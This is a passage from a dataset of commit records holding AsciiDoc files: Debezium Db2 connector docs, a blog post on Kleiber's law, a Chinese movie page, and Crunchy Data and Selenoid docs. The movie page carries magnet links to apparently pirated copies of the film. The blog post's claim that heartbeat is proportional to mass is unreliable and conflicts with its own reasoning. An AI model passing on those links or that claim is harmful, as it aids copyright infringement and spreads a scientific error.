`debezium.db2:type=connector-metrics,context=schema-history,server=_<database.server.name>_`.\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-schema-history-metrics.adoc[leveloffset=+1]\n\n\/\/ Type: reference\n\/\/ ModuleID: managing-debezium-db2-connectors\n\/\/ Title: Managing {prodname} Db2 connectors\n[[db2-management]]\n== Management\n\nAfter you deploy a {prodname} Db2 connector, use the {prodname} management UDFs to control Db2 replication (ASN) with SQL commands. Some of the UDFs expect a return value, in which case you use the SQL `VALUES` statement to invoke them. 
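\n\nFor example, the UDF that reports the status of the ASN agent returns its answer as a result set, so it is invoked with `VALUES` (this is the same command that is listed in the table below):\n\n[source,sql]\n----\nVALUES ASNCDC.ASNCDCSERVICES('status','asncdc');\n----\n\n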
For other UDFs, use the SQL `CALL` statement.\n\n.Descriptions of {prodname} management UDFs\n[cols=\"1,4\",options=\"header\"]\n|===\n|Task |Command and notes\n\n|[[debezium-db2-start-asn-agent]]<<debezium-db2-start-asn-agent,Start the ASN agent>>\n|`VALUES ASNCDC.ASNCDCSERVICES('start','asncdc');`\n\n|[[debezium-db2-stop-asn-agent]]<<debezium-db2-stop-asn-agent,Stop the ASN agent>>\n|`VALUES ASNCDC.ASNCDCSERVICES('stop','asncdc');`\n\n|[[debezium-db2-check-asn-agent]]<<debezium-db2-check-asn-agent,Check the status of the ASN agent>>\n|`VALUES ASNCDC.ASNCDCSERVICES('status','asncdc');`\n\n|[[debezium-db2-put-capture-mode]]<<debezium-db2-put-capture-mode,Put a table into capture mode>>\n|`CALL ASNCDC.ADDTABLE('MYSCHEMA', 'MYTABLE');` +\n +\nReplace `MYSCHEMA` with the name of the schema that contains the table you want to put into capture mode. Likewise, replace `MYTABLE` with the name of the table to put into capture mode.\n\n|[[debezium-db2-remove-capture-mode]]<<debezium-db2-remove-capture-mode,Remove a table from capture mode>>\n|`CALL ASNCDC.REMOVETABLE('MYSCHEMA', 'MYTABLE');`\n\n|[[debezium-db2-reinitialize-asn-service]]<<debezium-db2-reinitialize-asn-service,Reinitialize the ASN service>>\n|`VALUES ASNCDC.ASNCDCSERVICES('reinit','asncdc');` +\n +\nDo this after you put a table into capture mode or after you remove a table from capture mode.\n\n|===\n\n\/\/ Type: assembly\n\/\/ ModuleID: updating-schemas-for-db2-tables-in-capture-mode-for-debezium-connectors\n\/\/ Title: Updating schemas for Db2 tables in capture mode for {prodname} connectors\n[[db2-schema-evolution]]\n== Schema evolution\n\nWhile a {prodname} Db2 connector can capture schema changes, to update a schema, you must collaborate with a database administrator to ensure that the connector continues to produce change events. This is required by the way that Db2 implements replication.\n\nFor each table in capture mode, Db2's replication feature creates a change-data table that contains all changes to that source table. However, change-data table schemas are static. If you update the schema for a table in capture mode then you must also update the schema of its corresponding change-data table. A {prodname} Db2 connector cannot do this. A database administrator with elevated privileges must update schemas for tables that are in capture mode.\n\n[WARNING]\n====\nIt is vital to execute a schema update procedure completely before there is a new schema update on the same table. Consequently, the recommendation is to execute all DDLs in a single batch so the schema update procedure is done only once.\n====\n\nThere are generally two procedures for updating table schemas:\n\n* {link-prefix}:{link-db2-connector}#db2-offline-schema-update[Offline - executed while {prodname} is stopped]\n* {link-prefix}:{link-db2-connector}#db2-online-schema-update[Online - executed while {prodname} is running]\n\nEach approach has advantages and disadvantages.\n\n\/\/ Type: procedure\n\/\/ ModuleID: performing-offline-schema-updates-for-debezium-db2-connectors\n\/\/ Title: Performing offline schema updates for {prodname} Db2 connectors\n[[db2-offline-schema-update]]\n=== Offline schema update\n\nYou stop the {prodname} Db2 connector before you perform an offline schema update. While this is the safer schema update procedure, it might not be feasible for applications with high-availability requirements.\n\n.Prerequisites\n\n* One or more tables that are in capture mode require schema updates.\n\n.Procedure\n\n. 
Suspend the application that updates the database.\n. Wait for the {prodname} connector to stream all unstreamed change event records.\n. Stop the {prodname} connector.\n. Apply all changes to the source table schema.\n. In the ASN register table, mark the tables with updated schemas as `INACTIVE`.\n. {link-prefix}:{link-db2-connector}#debezium-db2-reinitialize-asn-service[Reinitialize the ASN capture service.]\n. Remove the source table with the old schema from capture mode by {link-prefix}:{link-db2-connector}#debezium-db2-remove-capture-mode[running the {prodname} UDF for removing tables from capture mode].\n. Add the source table with the new schema to capture mode by {link-prefix}:{link-db2-connector}#debezium-db2-put-capture-mode[running the {prodname} UDF for adding tables to capture mode].\n. In the ASN register table, mark the updated source tables as `ACTIVE`.\n. {link-prefix}:{link-db2-connector}#debezium-db2-reinitialize-asn-service[Reinitialize the ASN capture service.]\n. Resume the application that updates the database.\n. Restart the {prodname} connector.\n\n\/\/ Type: procedure\n\/\/ ModuleID: performing-online-schema-updates-for-debezium-db2-connectors\n\/\/ Title: Performing online schema updates for {prodname} Db2 connectors\n[[db2-hot-schema-update]]\n=== Online schema update\n\nAn online schema update does not require application and data processing downtime. That is, you do not stop the {prodname} Db2 connector before you perform an online schema update. Also, an online schema update procedure is simpler than the procedure for an offline schema update.\n\nHowever, when a table is in capture mode, after a change to a column name, the Db2 replication feature continues to use the old column name. The new column name does not appear in {prodname} change events. You must restart the connector to see the new column name in change events.\n\n.Prerequisites\n\n* One or more tables that are in capture mode require schema updates.\n\n.Procedure when adding a column to the end of a table\n\n. Lock the source tables whose schema you want to change.\n. In the ASN register table, mark the locked tables as `INACTIVE`.\n. {link-prefix}:{link-db2-connector}#debezium-db2-reinitialize-asn-service[Reinitialize the ASN capture service.]\n. Apply all changes to the schemas for the source tables.\n. Apply all changes to the schemas for the corresponding change-data tables.\n. In the ASN register table, mark the source tables as `ACTIVE`.\n. {link-prefix}:{link-db2-connector}#debezium-db2-reinitialize-asn-service[Reinitialize the ASN capture service.]\n. Optional. Restart the connector to see updated column names in change events.\n\n.Procedure when adding a column to the middle of a table\n\n. Lock the source table(s) to be changed.\n. In the ASN register table, mark the locked tables as `INACTIVE`.\n. {link-prefix}:{link-db2-connector}#debezium-db2-reinitialize-asn-service[Reinitialize the ASN capture service.]\n. For each source table to be changed:\n.. Export the data in the source table.\n.. Truncate the source table.\n.. Alter the source table and add the column.\n.. Load the exported data into the altered source table.\n.. Export the data in the source table's corresponding change-data table.\n.. Truncate the change-data table.\n.. Alter the change-data table and add the column.\n.. Load the exported data into the altered change-data table.\n. In the ASN register table, mark the tables as `INACTIVE`. 
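\n+\nA hedged sketch of what marking a table `INACTIVE` can look like in SQL (it assumes that the replication register table is `ASNCDC.IBMSNAP_REGISTER` and that its `STATE` column holds `'A'` for active and `'I'` for inactive; verify the control table names in your environment):\n+\n[source,sql]\n----\n-- Assumption: the SQL Replication control tables live in the ASNCDC schema\nUPDATE ASNCDC.IBMSNAP_REGISTER\n  SET STATE = 'I'\n  WHERE SOURCE_OWNER = 'MYSCHEMA' AND SOURCE_TABLE = 'MYTABLE';\n----\n+\n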
This marks the old change-data tables as inactive, which preserves the data in them while ensuring that they are no longer updated.\n. {link-prefix}:{link-db2-connector}#debezium-db2-reinitialize-asn-service[Reinitialize the ASN capture service.]\n. Optional. Restart the connector to see updated column names in change events.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d34852ebc8be2096d3548536148840da9c2b618e","subject":"Update 2010-11-17-Kleibers-Law.adoc","message":"Update 2010-11-17-Kleibers-Law.adoc","repos":"raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io","old_file":"_posts\/2010-11-17-Kleibers-Law.adoc","new_file":"_posts\/2010-11-17-Kleibers-Law.adoc","new_contents":"= Kleiber's Law\n:hp-tags: light bulb, migrated\n:published_at: 2010-11-17\n\nLast week, I happened to read about Kleiber's law while browsing through literature on natural evolution. The implications are really fascinating. It establishes a relationship between mass and metabolism as:\n\n\\(metabolism = mass^{\\frac{3}{4}}\\)\n\nFor example, an animal 10,000 times as massive has only about 1,000 times the metabolic rate, since \\(10000^{3\/4} = 1000\\).\n\nMetabolism is ultimately linked to the number of heartbeats since the heart regulates the supply of oxygen. Therefore, \\(\\mid heartbeat \\mid \\propto mass\\). Curiously, the number of heartbeats per lifetime tends to be constant. This means that bigger\/heavier animals tend to have slower metabolism with lower heart rate compared to, say, flies, with faster metabolism.\n\nIronically, if we have a fixed number of heartbeats, wouldn't running\/exercising make us die faster? I suppose the long term benefits outweigh the short term loss.\n","old_contents":"= Kleiber's Law\n:hp-tags: light bulb, migrated\n\nLast week, I happened to read about Kleiber's law while browsing through literature on natural evolution. The implications are really fascinating. It establishes a relationship between mass and metabolism as:\n\n\\(metabolism = mass^{\\frac{3}{4}}\\)\n\nMetabolism is ultimately linked to the number of heartbeats since the heart regulates the supply of oxygen. Therefore, \\(\\mid heartbeat \\mid \\propto mass\\). Curiously, the number of heartbeats per lifetime tends to be constant. This means that bigger\/heavier animals tend to have slower metabolism with lower heart rate compared to, say, flies, with faster metabolism.\n\nIronically, if we have fixed number of heartbeats, wouldn't running\/exercising make us die faster? 
I suppose, the long term benefits outweigh shot term loss.\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"7ab6b4b34b8acf7e53f1961812f1f6386d38400b","subject":"Update 2015-10-16-Crimson-Peak.adoc","message":"Update 2015-10-16-Crimson-Peak.adoc","repos":"heartnn\/hubpress.io,heartnn\/hubpress.io,heartnn\/hubpress.io,heartnn\/hubpress.io","old_file":"_posts\/2015-10-16-Crimson-Peak.adoc","new_file":"_posts\/2015-10-16-Crimson-Peak.adoc","new_contents":"= \u7329\u7ea2\u5c71\u5cf0 Crimson Peak\n:hp-alt-title: Crimson Peak\n:published_at: 2015-10-16\n:hp-tags: 2015 \u5267\u60c5\n:hardbreaks:\n\nimage::http:\/\/i12.tietuku.com\/3a6a071dff411487t.jpg[link=\"http:\/\/i12.tietuku.com\/3a6a071dff411487.jpg\"]\n\n== \u7329\u7ea2\u5c71\u5cf0 Crimson Peak (2015)\n\u5bfc\u6f14: \u5409\u5c14\u83ab\u00b7\u5fb7\u5c14\u00b7\u6258\u7f57\n\u7f16\u5267: \u5409\u5c14\u83ab\u00b7\u5fb7\u5c14\u00b7\u6258\u7f57 \/ \u9a6c\u4fee\u00b7\u7f57\u5bbe\u65af \/ \u9732\u8f9b\u8fbe\u00b7\u8003\u514b\u68ee\n\u4e3b\u6f14: \u7c73\u5a05\u00b7\u534e\u5e0c\u79d1\u6c83\u65af\u5361 \/ \u6c64\u59c6\u00b7\u5e0c\u5fb7\u52d2\u65af\u987f \/ \u6770\u897f\u5361\u00b7\u67e5\u65af\u5766 \/ \u67e5\u7406\u00b7\u6c49\u7eb3\u59c6 \/ \u5409\u59c6\u00b7\u6bd4\u5f17\n\u7c7b\u578b: \u5267\u60c5 \/ \u60ac\u7591 \/ \u60ca\u609a\n\u5b98\u65b9\u7f51\u7ad9: http:\/\/crimsonpeak-film.com[crimsonpeak-film.com]\n\u5236\u7247\u56fd\u5bb6\/\u5730\u533a: \u7f8e\u56fd \/ \u52a0\u62ff\u5927\n\u8bed\u8a00: \u82f1\u8bed\n\u4e0a\u6620\u65e5\u671f: 2015-10-16(\u7f8e\u56fd)\n\u7247\u957f: 119\u5206\u949f\n\u53c8\u540d: \u8840\u8272\u5e84\u56ed(\u6e2f) \/ \u8165\u7ea2\u5c71\u5e84(\u53f0) \/ Haunted Peak\nIMDb\u94fe\u63a5: http:\/\/www.imdb.com\/title\/tt2554274[tt2554274]\n\n== \u5267\u60c5\u7b80\u4ecb\n\u3000\u3000\u4f0a\u8fea\u65af\uff08\u7c73\u5a05\u00b7\u534e\u5e0c\u79d1\u6c83\u65af\u5361 Mia Wasikowska \u9970\uff09\u662f\u4e00\u540d\u4e1a\u4f59\u6050\u6016\u5c0f\u8bf4\u4f5c\u5bb6\uff0c\u67d0\u65e5\uff0c\u5979\u9082\u9005\u4e86\u82f1\u4fca\u7684\u82f1\u56fd\u53d1\u660e\u5bb6\u6258\u9a6c\u65af\uff08\u6c64\u59c6\u00b7\u5e0c\u5fb7\u52d2\u65af\u987f Tom Hiddleston \u9970\uff09\uff0c\u540e\u8005\u7684\u5f6c\u5f6c\u6709\u793c\u6e29\u6587\u5c14\u96c5\u5f88\u5feb\u5c31\u5438\u5f15\u4e86\u4f0a\u8fea\u65af\u7684\u6ce8\u610f\uff0c\u4e24\u4eba\u53d1\u5c55\u8fc5\u901f\u3002\u7136\u800c\uff0c\u4f0a\u8fea\u65af\u7684\u7236\u4eb2\u5361\u7279\uff08\u5409\u59c6\u00b7\u6bd4\u5f17 Jim Beaver \u9970\uff09\u5374\u5bf9\u6258\u9a6c\u65af\u5145\u6ee1\u4e86\u654c\u610f\uff0c\u575a\u51b3\u53cd\u5bf9\u5973\u513f\u540c\u4ed6\u6765\u5f80\u3002\n\u3000\u3000\u5c31\u5728\u8fd9\u4e2a\u8282\u9aa8\u773c\u4e0a\uff0c\u5361\u7279\u610f\u5916\u8eab\u4ea1\uff0c\u4f0a\u8fea\u65af\u6bc5\u7136\u51b3\u5b9a\u79bb\u5f00\u81ea\u5df1\u7684\u5bb6\u4e61\uff0c\u8ddf\u968f\u6258\u9a6c\u65af\u6765\u5230\u4e86\u51b0\u5929\u96ea\u5730\u7684\u574e\u5e03\u91cc\u4e9a\u90e1\uff0c\u5728\u8fd9\u91cc\uff0c\u77d7\u7acb\u7740\u4e00\u95f4\u8c6a\u534e\u800c\u53c8\u8352\u51c9\u7684\u522b\u5885\uff0c\u4eba\u4eec\u79f0\u5b83\u4e3a\u201c\u7329\u7ea2\u5c71\u5e84\u201d\u3002\u8fce\u63a5\u4f0a\u8fea\u65af\u548c\u6258\u9a6c\u65af\u7684\uff0c\u662f\u6258\u9a6c\u65af\u7684\u59d0\u59d0\u9732\u5e0c\u5c14\uff08\u6770\u897f\u5361\u00b7\u67e5\u65af\u5766 Jessica Chastain 
\u9970\uff09\uff0c\u9732\u5e0c\u5c14\u8be1\u5f02\u800c\u53c8\u7c97\u66b4\u7684\u6001\u5ea6\u8ba9\u4f0a\u8fea\u65af\u611f\u5230\u5341\u5206\u4e0d\u9002\u3002\u5f88\u5feb\uff0c\u4f0a\u8fea\u65af\u5c31\u53d1\u73b0\uff0c\u5728\u8fd9\u5ea7\u4eff\u4f5b\u5177\u6709\u751f\u547d\u7684\u522b\u5885\u91cc\uff0c\u98d8\u8361\u7740\u6570\u7f15\u6e38\u9b42\uff0c\u57cb\u85cf\u4e86\u6570\u4e0d\u6e05\u7684\u79d8\u5bc6\u3002\n\n== \u4e0b\u8f7d\n\u7329\u7ea2\u5c71\u5cf0.Crimson.Peak.2015.BD720P.X264.AAC.English.CHS-ENG.Mp4Ba.mp4\nlink:magnet:?xt=urn:btih:6ff9d5c12e8dad2be3ecb38826107e333fefbbf0[Magnet]\n\n\u7329\u7ea2\u5c71\u5cf0.Crimson.Peak.2015.BD1080P.X264.AAC.English.CHS-ENG.Mp4Ba.mp4\nlink:magnet:?xt=urn:btih:152a352ff89c1bae2296b52363aa5bd9f7603618[Magnet]","old_contents":"= \u7329\u7ea2\u5c71\u5cf0 Crimson Peak\n:hp-alt-title: Crimson Peak\n:published_at: 2015-10-16\n:hp-tags: 2015\n:hardbreaks:\n\nimage::http:\/\/i12.tietuku.com\/3a6a071dff411487t.jpg[link=\"http:\/\/i12.tietuku.com\/3a6a071dff411487.jpg\"]\n\n== \u7329\u7ea2\u5c71\u5cf0 Crimson Peak (2015)\n\u5bfc\u6f14: \u5409\u5c14\u83ab\u00b7\u5fb7\u5c14\u00b7\u6258\u7f57\n\u7f16\u5267: \u5409\u5c14\u83ab\u00b7\u5fb7\u5c14\u00b7\u6258\u7f57 \/ \u9a6c\u4fee\u00b7\u7f57\u5bbe\u65af \/ \u9732\u8f9b\u8fbe\u00b7\u8003\u514b\u68ee\n\u4e3b\u6f14: \u7c73\u5a05\u00b7\u534e\u5e0c\u79d1\u6c83\u65af\u5361 \/ \u6c64\u59c6\u00b7\u5e0c\u5fb7\u52d2\u65af\u987f \/ \u6770\u897f\u5361\u00b7\u67e5\u65af\u5766 \/ \u67e5\u7406\u00b7\u6c49\u7eb3\u59c6 \/ \u5409\u59c6\u00b7\u6bd4\u5f17\n\u7c7b\u578b: \u5267\u60c5 \/ \u60ac\u7591 \/ \u60ca\u609a\n\u5b98\u65b9\u7f51\u7ad9: http:\/\/crimsonpeak-film.com[crimsonpeak-film.com]\n\u5236\u7247\u56fd\u5bb6\/\u5730\u533a: \u7f8e\u56fd \/ \u52a0\u62ff\u5927\n\u8bed\u8a00: \u82f1\u8bed\n\u4e0a\u6620\u65e5\u671f: 2015-10-16(\u7f8e\u56fd)\n\u7247\u957f: 119\u5206\u949f\n\u53c8\u540d: \u8840\u8272\u5e84\u56ed(\u6e2f) \/ \u8165\u7ea2\u5c71\u5e84(\u53f0) \/ Haunted Peak\nIMDb\u94fe\u63a5: http:\/\/www.imdb.com\/title\/tt2554274[tt2554274]\n\n== \u5267\u60c5\u7b80\u4ecb\n\u3000\u3000\u4f0a\u8fea\u65af\uff08\u7c73\u5a05\u00b7\u534e\u5e0c\u79d1\u6c83\u65af\u5361 Mia Wasikowska \u9970\uff09\u662f\u4e00\u540d\u4e1a\u4f59\u6050\u6016\u5c0f\u8bf4\u4f5c\u5bb6\uff0c\u67d0\u65e5\uff0c\u5979\u9082\u9005\u4e86\u82f1\u4fca\u7684\u82f1\u56fd\u53d1\u660e\u5bb6\u6258\u9a6c\u65af\uff08\u6c64\u59c6\u00b7\u5e0c\u5fb7\u52d2\u65af\u987f Tom Hiddleston \u9970\uff09\uff0c\u540e\u8005\u7684\u5f6c\u5f6c\u6709\u793c\u6e29\u6587\u5c14\u96c5\u5f88\u5feb\u5c31\u5438\u5f15\u4e86\u4f0a\u8fea\u65af\u7684\u6ce8\u610f\uff0c\u4e24\u4eba\u53d1\u5c55\u8fc5\u901f\u3002\u7136\u800c\uff0c\u4f0a\u8fea\u65af\u7684\u7236\u4eb2\u5361\u7279\uff08\u5409\u59c6\u00b7\u6bd4\u5f17 Jim Beaver 
\u9970\uff09\u5374\u5bf9\u6258\u9a6c\u65af\u5145\u6ee1\u4e86\u654c\u610f\uff0c\u575a\u51b3\u53cd\u5bf9\u5973\u513f\u540c\u4ed6\u6765\u5f80\u3002\n\u3000\u3000\u5c31\u5728\u8fd9\u4e2a\u8282\u9aa8\u773c\u4e0a\uff0c\u5361\u7279\u610f\u5916\u8eab\u4ea1\uff0c\u4f0a\u8fea\u65af\u6bc5\u7136\u51b3\u5b9a\u79bb\u5f00\u81ea\u5df1\u7684\u5bb6\u4e61\uff0c\u8ddf\u968f\u6258\u9a6c\u65af\u6765\u5230\u4e86\u51b0\u5929\u96ea\u5730\u7684\u574e\u5e03\u91cc\u4e9a\u90e1\uff0c\u5728\u8fd9\u91cc\uff0c\u77d7\u7acb\u7740\u4e00\u95f4\u8c6a\u534e\u800c\u53c8\u8352\u51c9\u7684\u522b\u5885\uff0c\u4eba\u4eec\u79f0\u5b83\u4e3a\u201c\u7329\u7ea2\u5c71\u5e84\u201d\u3002\u8fce\u63a5\u4f0a\u8fea\u65af\u548c\u6258\u9a6c\u65af\u7684\uff0c\u662f\u6258\u9a6c\u65af\u7684\u59d0\u59d0\u9732\u5e0c\u5c14\uff08\u6770\u897f\u5361\u00b7\u67e5\u65af\u5766 Jessica Chastain \u9970\uff09\uff0c\u9732\u5e0c\u5c14\u8be1\u5f02\u800c\u53c8\u7c97\u66b4\u7684\u6001\u5ea6\u8ba9\u4f0a\u8fea\u65af\u611f\u5230\u5341\u5206\u4e0d\u9002\u3002\u5f88\u5feb\uff0c\u4f0a\u8fea\u65af\u5c31\u53d1\u73b0\uff0c\u5728\u8fd9\u5ea7\u4eff\u4f5b\u5177\u6709\u751f\u547d\u7684\u522b\u5885\u91cc\uff0c\u98d8\u8361\u7740\u6570\u7f15\u6e38\u9b42\uff0c\u57cb\u85cf\u4e86\u6570\u4e0d\u6e05\u7684\u79d8\u5bc6\u3002\n\n== \u4e0b\u8f7d\n\u7329\u7ea2\u5c71\u5cf0.Crimson.Peak.2015.BD720P.X264.AAC.English.CHS-ENG.Mp4Ba.mp4\nlink:magnet:?xt=urn:btih:6ff9d5c12e8dad2be3ecb38826107e333fefbbf0[Magnet]\n\n\u7329\u7ea2\u5c71\u5cf0.Crimson.Peak.2015.BD1080P.X264.AAC.English.CHS-ENG.Mp4Ba.mp4\nlink:magnet:?xt=urn:btih:152a352ff89c1bae2296b52363aa5bd9f7603618[Magnet]","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"d6fa948b4b8358b5455befffabb7fc452a3ef68a","subject":"Update 2019-01-31-Blog-Servers.adoc","message":"Update 2019-01-31-Blog-Servers.adoc","repos":"lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io","old_file":"_posts\/2019-01-31-Blog-Servers.adoc","new_file":"_posts\/2019-01-31-Blog-Servers.adoc","new_contents":"= \u535a\u5ba2\u670d\u52a1\n:hp-image: \/covers\/cover.png\n:published_at: 2019-01-31\n:hp-tags: Blog, \n:hp-alt-title: Blog Servers\n\n== \u4e16\u754c\n* https:\/\/www.blogger.com\/about\/?r=1-null_user[Blogger^]\n","old_contents":"= \u535a\u5ba2\u670d\u52a1\n:hp-image: \/covers\/cover.png\n:published_at: 2019-01-31\n:hp-tags: Blog, \n:hp-alt-title: Blog Servers\n\n== \u4e16\u754c\n* https:\/\/www.blogger.com\/about\/?r=1-null_user[Blogger]\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"8ec61408735288def60cf23c45de3e4fe58891ba","subject":"update all-in-one docs","message":"update all-in-one docs\n","repos":"CrunchyData\/crunchy-containers,the1forte\/crunchy-containers,CrunchyData\/crunchy-containers,the1forte\/crunchy-containers,the1forte\/crunchy-containers,CrunchyData\/crunchy-containers","old_file":"docs\/all-in-one\/all-in-one.asciidoc","new_file":"docs\/all-in-one\/all-in-one.asciidoc","new_contents":"= all-in-one explained\nCrunchy Data Solutions, Inc.\nv1.2.6, {docdate}\n:title-logo-image: image:crunchy_logo.png[\"CrunchyData Logo\",align=\"center\",scaledwidth=\"80%\"]\n\n== All-In-One Crunchy OSE Image\n\nTo allow users to take a look at crunchy on Openshift, \nwe have created an all-in-one Virtual Machine that you\ncan run which will include Openshift and the Crunchy\ncontainers.\n\nThe image can be imported as an appliance in VirtualBox.\n\n=== configuration\n\n\nThe image uses a NAT interface and Host Only 
Interface for networking. \nThe Host Only interface lets us set a static IP of 192.168.56.6, this\naddress is related to the host's vboxnet0 ip address which by default\nis 192.168.56.1 on VirtualBox. \n\nThe NAT interface allows the VM access to the internet and allows\nfor ssh access from the host.\n\nThe VM has an entry in \/etc\/dhcp\/dhclient.conf that prepends\nthe 192.168.56.6 address as a nameserver. This allows us to \ndo DNS discovery using the Openshift DNS container which \nbinds to 192.168.56.6:53.\n\nThe image includes a Gnome UI environment if you want to use that, \nespecially useful for using the Openshift web console.\n\nThe VM instance has a *crunchy* user created with a password of *crunchy*.\nThis user has sudo privs.\n\n=== Openshift 3.3\n\nOpenshift 3.3 is installed and running when you start the VM.\n\nThere are 10 small PVs already created and each is hosted on \na local NFS \/nfsfileshare.\n\nThe openshift is configured to allow any user to log in. The *crunchy*\nuser is already created, a password of *crunchy* is also specified. An\nopenshift project named *crunchy* is already created as well.\n\nThe *crunchy* openshift user has been granted openshift cluster-admin\nprivs which allows it to do pretty much anything including\ncreating PVs.\n\nYou can start Gnome by logging in and typing:\n....\nstartx\n....\n\nFirefox is installed and the openshift console is available at https:\/\/10.0.2.15:8443\/console\n\n=== Crunchy Images\n\nThe crunchy version 1.2.6 container images are preinstalled\nin the VM instance.\n\n=== Crunchy Examples\n\nThe crunchy container examples for openshift are installed\nhere:\n\n==== $BUILDBASE\/examples\/openshift\nThis directory contains all sorts of examples that create pods\nand services when you run the run.sh script in each subdirectory.\n\n==== $BUILDBASE\/examples\/dedicated\nThis directory contains openshift templates that are pre-installed\ninto the Openshift environment, with these you can click on Add To Project\nin the web console to deploy containers.\n\n\t\n\n== Legal Notices\n\nCopyright \u00a9 2016 Crunchy Data Solutions, Inc.\n\nCRUNCHY DATA SOLUTIONS, INC. PROVIDES THIS GUIDE \"AS IS\" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF NON INFRINGEMENT, MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE.\n\nCrunchy, Crunchy Data Solutions, Inc. and the Crunchy Hippo Logo are trademarks of Crunchy Data Solutions, Inc.\n\n","old_contents":"= all-in-one explained\nCrunchy Data Solutions, Inc.\nv1.2.6, {docdate}\n:title-logo-image: image:crunchy_logo.png[\"CrunchyData Logo\",align=\"center\",scaledwidth=\"80%\"]\n\n== All-In-One Crunchy OSE Image\n\nTo allow users to take a look at crunchy on Openshift, \nwe have created an all-in-one Virtual Machine that you\ncan run which will include Openshift and the Crunchy\ncontainers.\n\nThe image can be imported as an appliance in VirtualBox.\n\n=== configuration\n\n\nThe image uses a NAT interface for networking. \n\nThe image includes a Gnome UI environment if you want to use that, \nespecially useful for using the Openshift web console.\n\nThe VM instance has a *crunchy* user created with a password of *crunchy*.\nThis user has sudo privs.\n\n=== Openshift 3.3\n\nOpenshift 3.3 is installed and running when you start the VM.\n\nThere are 10 small PVs already created and each is hosted on \na local NFS \/nfsfileshare.\n\nThe openshift is configured to allow any user to log in. 
The *crunchy*\nuser is already created, a password of *crunchy* is also specified. An\nopenshift project named *crunchy* is already created as well.\n\nThe *crunchy* openshift user has been granted openshift cluster-admin\nprivs which allows it to do pretty much anything including\ncreating PVs.\n\nYou can start Gnome by logging in and typing:\n....\nstartx\n....\n\nFirefox is installed and the openshift console is available at https:\/\/10.0.2.15:8443\/console\n\n=== Crunchy Images\n\nThe crunchy version 1.2.6 container images are preinstalled\nin the VM instance.\n\n=== Crunchy Examples\n\nThe crunchy container examples for openshift are installed\nhere:\n\n==== $BUILDBASE\/examples\/openshift\nThis directory contains all sorts of examples that create pods\nand services when you run the run.sh script in each subdirectory.\n\n==== $BUILDBASE\/examples\/dedicated\nThis directory contains openshift templates that are pre-installed\ninto the Openshift environment, with these you can click on Add To Project\nin the web console to deploy containers.\n\n\t\n\n== Legal Notices\n\nCopyright \u00a9 2016 Crunchy Data Solutions, Inc.\n\nCRUNCHY DATA SOLUTIONS, INC. PROVIDES THIS GUIDE \"AS IS\" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF NON INFRINGEMENT, MERCHANTABILITY OR FITNESS FOR A PARTICULAR PURPOSE.\n\nCrunchy, Crunchy Data Solutions, Inc. and the Crunchy Hippo Logo are trademarks of Crunchy Data Solutions, Inc.\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"57a610b207f28b45e7f7ff0daf6caab4b47ec0e8","subject":"Added Chrome 74.0 image information","message":"Added Chrome 74.0 image information\n","repos":"aerokube\/selenoid,aandryashin\/selenoid,vania-pooh\/selenoid,aandryashin\/selenoid,vania-pooh\/selenoid,aerokube\/selenoid","old_file":"docs\/browser-image-information.adoc","new_file":"docs\/browser-image-information.adoc","new_contents":"== Browser Image information\n=== Firefox\n\n.Firefox Images with Selenium Server\n|===\n| Image | VNC Image | Selenium Version | Firefox Version | Client Version\n\n| selenoid\/firefox:3.6 | selenoid\/vnc:firefox_3.6 | 2.20.0 | 3.6.16 i386 (dialogs may not work) .7+<.^|\n**Java:** 2.53.1 and below\n**Python:** not supported\n**selenium-webdriver.js:** not supported\n| selenoid\/firefox:4.0 | selenoid\/vnc:firefox_4.0 | 2.20.0 | 4.0.1 i386\n| selenoid\/firefox:5.0 | selenoid\/vnc:firefox_5.0 | 2.20.0 | 5.0.1 i386\n| selenoid\/firefox:6.0 | selenoid\/vnc:firefox_6.0 | 2.20.0 | 6.0.2 i386\n| selenoid\/firefox:7.0 | selenoid\/vnc:firefox_7.0 | 2.20.0 | 7.0.1 i386\n| selenoid\/firefox:8.0 | selenoid\/vnc:firefox_8.0 | 2.20.0 | 8.0.1 i386\n| selenoid\/firefox:9.0 | selenoid\/vnc:firefox_9.0 | 2.20.0 | 9.0.1\n| selenoid\/firefox:10.0 | selenoid\/vnc:firefox_10.0 | 2.32.0 | 10.0.2 .13+<.^|\n**Java:** any modern version\n**Python:** not supported\n**selenium-webdriver.js:** not supported\n| selenoid\/firefox:11.0 | selenoid\/vnc:firefox_11.0 | 2.32.0 | 11.0\n| selenoid\/firefox:12.0 | selenoid\/vnc:firefox_12.0 | 2.32.0 | 12.0\n| selenoid\/firefox:13.0 | selenoid\/vnc:firefox_13.0 | 2.32.0 | 13.0\n| selenoid\/firefox:14.0 | selenoid\/vnc:firefox_14.0 | 2.32.0 | 14.0.1\n| selenoid\/firefox:15.0 | selenoid\/vnc:firefox_15.0 | 2.32.0 | 15.0.1\n| selenoid\/firefox:16.0 | selenoid\/vnc:firefox_16.0 | 2.32.0 | 16.0.2\n| selenoid\/firefox:17.0 | selenoid\/vnc:firefox_17.0 | 2.32.0 | 17.0.1\n| selenoid\/firefox:18.0 | selenoid\/vnc:firefox_18.0 | 2.32.0 | 18.0.2\n| 
